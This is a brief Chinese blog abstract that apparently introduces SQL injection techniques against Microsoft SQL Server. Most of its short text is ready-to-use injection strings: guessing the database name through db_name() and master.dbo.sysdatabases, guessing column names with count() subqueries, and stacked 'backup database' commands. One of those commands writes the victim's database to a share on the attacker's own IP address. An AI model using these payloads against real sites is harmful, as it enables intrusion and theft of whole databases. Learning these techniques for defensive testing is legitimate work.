摘要： 最简单的一种SQL注入，常见的注入语句还有：1)猜测数据库名，备份数据库a)猜测数据库名：and db_name() >0或系统表master.dbo.sysdatabasesb)备份数据库：;backup database数据库名to disk = ‘c:\*.db’;--或：declare @a sysname;set @a=db_name();backup database @a to disk='你的IP你的共享目录bak.dat' ,name='test';--2)猜解字段名称a)猜解法：and (select count(字段名) from表名 阅读全文